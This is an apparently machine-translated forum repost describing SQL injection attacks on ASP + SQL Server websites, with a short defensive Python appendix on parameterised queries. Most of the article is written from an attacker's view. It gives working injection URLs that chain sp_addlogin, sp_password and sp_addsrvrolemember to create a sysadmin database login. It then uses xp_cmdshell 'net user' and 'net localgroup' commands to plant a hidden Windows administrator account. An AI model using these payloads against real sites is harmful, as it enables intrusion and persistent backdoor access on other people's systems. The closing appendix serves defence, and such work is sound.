Some attacks on SQL databases (repost)

Source: Internet
Author: User
Many news sites, BBSes and e-commerce sites, at home and abroad, are built on ASP + SQL, and there are many ASP programmers (a lot of them recent graduates), so the success rate of ASP + SQL attacks is relatively high. This kind of attack has little to do with the NT version or the SQL version, and there is no corresponding patch, because the vulnerability is caused by the programmer; the source code examples in most books that explain ASP programming have this flaw. In fact, the attack is nothing more than legitimate-looking ASP requests to SQL, yet it leaves endless trouble behind!
This attack method originated from the "or 1=1" vulnerability (we will call it a vulnerability); I think everyone knows the principle of that hole. What followed it was ;exec sp_addlogin Hax (add a Hax user to the database). But this method is very restrictive: first, the SQL Server account that the ASP uses must be an administrator; second, the submitted value must sit at the end of the entire SQL statement. Some programmers query the database in the form SELECT * FROM news WHERE id=... AND topic=... AND ..., so if you use the example above,
News.asp?id=2;exec sp_addlogin Hax
becomes SELECT * FROM news WHERE id=2;exec sp_addlogin Hax AND topic=... AND ...
In the resulting statement, the AND conditions now follow the call to the sp_addlogin stored procedure, so the syntax is wrong and sp_addlogin naturally cannot run either. So try the following method:
News.asp?id=2;exec sp_addlogin hax;--
The trailing -- turns the conditions that follow sp_addlogin into a comment, so there is no syntax error and sp_addlogin executes normally!
Then let's use these together:
News.asp?id=2;exec Master.dbo.sp_addlogin hax;--
News.asp?id=2;exec Master.dbo.sp_password null,hax,hax;--
News.asp?id=2;exec Master.dbo.sp_addsrvrolemember SysAdmin hax;--
News.asp?id=2;exec Master.dbo.xp_cmdshell net user Hax hax/workstations:*/times:all/passwordchg:yes/passwordreq:yes
/active:yes/add;--
News.asp?id=2;exec Master.dbo.xp_cmdshell net localgroup administrators hax/add;--
So you have left a Hax administrator account in both his database and his system.
Of course, the prerequisite is that the ASP uses an administrator account, so there is no point trying this on virtual hosting space; the hole will not be there.
Later we will discuss how to get in when the other side's ASP does not use a SQL administrator account; that will of course involve intrusion through port 1433.
Of course, we can also try adding a symbol after id=2, mainly to see how the other side's ASP is written.
What do we do when the SQL account that the ASP program uses is not an admin?
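
The root cause behind the requests above, shown as an added example (not code from the original article): a request value pasted into the SQL text lets a trailing -- drop the rest of the WHERE clause, while a validated id passed as a bound parameter cannot. It uses Python's sqlite3 as a stand-in for ASP + SQL Server; the table contents and the function names make_db, build_concat, parse_id and fetch_news are assumptions made for the illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample table modelled on the article's "news" query.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, topic TEXT, body TEXT)")
    db.executemany("INSERT INTO news VALUES (?, ?, ?)",
                   [(1, "tech", "first"), (2, "tech", "second"), (2, "sport", "third")])
    return db

def build_concat(id_param, topic):
    # Vulnerable pattern: the request value becomes part of the SQL text.
    return ("SELECT id, topic, body FROM news WHERE id=" + id_param
            + " AND topic='" + topic + "'")

def parse_id(id_param):
    # Allow-list validation: only a plain decimal integer is an id.
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        raise ValueError("id must be a decimal integer")
    return int(id_param)

def fetch_news(db, id_param, topic):
    # Hardened: validated id plus bound parameters; input is data, never SQL.
    sql = "SELECT id, topic, body FROM news WHERE id = ? AND topic = ?"
    return db.execute(sql, (parse_id(id_param), topic)).fetchall()

if __name__ == "__main__":
    db = make_db()
    hostile = "2 --"  # constructed input: comment marker only
    sql = build_concat(hostile, "sport")
    print(sql)
    print(db.execute(sql).fetchall())   # topic filter has been commented out
    print(fetch_news(db, "2", "sport"))
    try:
        fetch_news(db, hostile, "sport")
    except ValueError as err:
        print("rejected:", err)
```

On SQL Server the same two rules apply, and running the ASP application under a database account that is not an administrator removes the prerequisite the article names.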
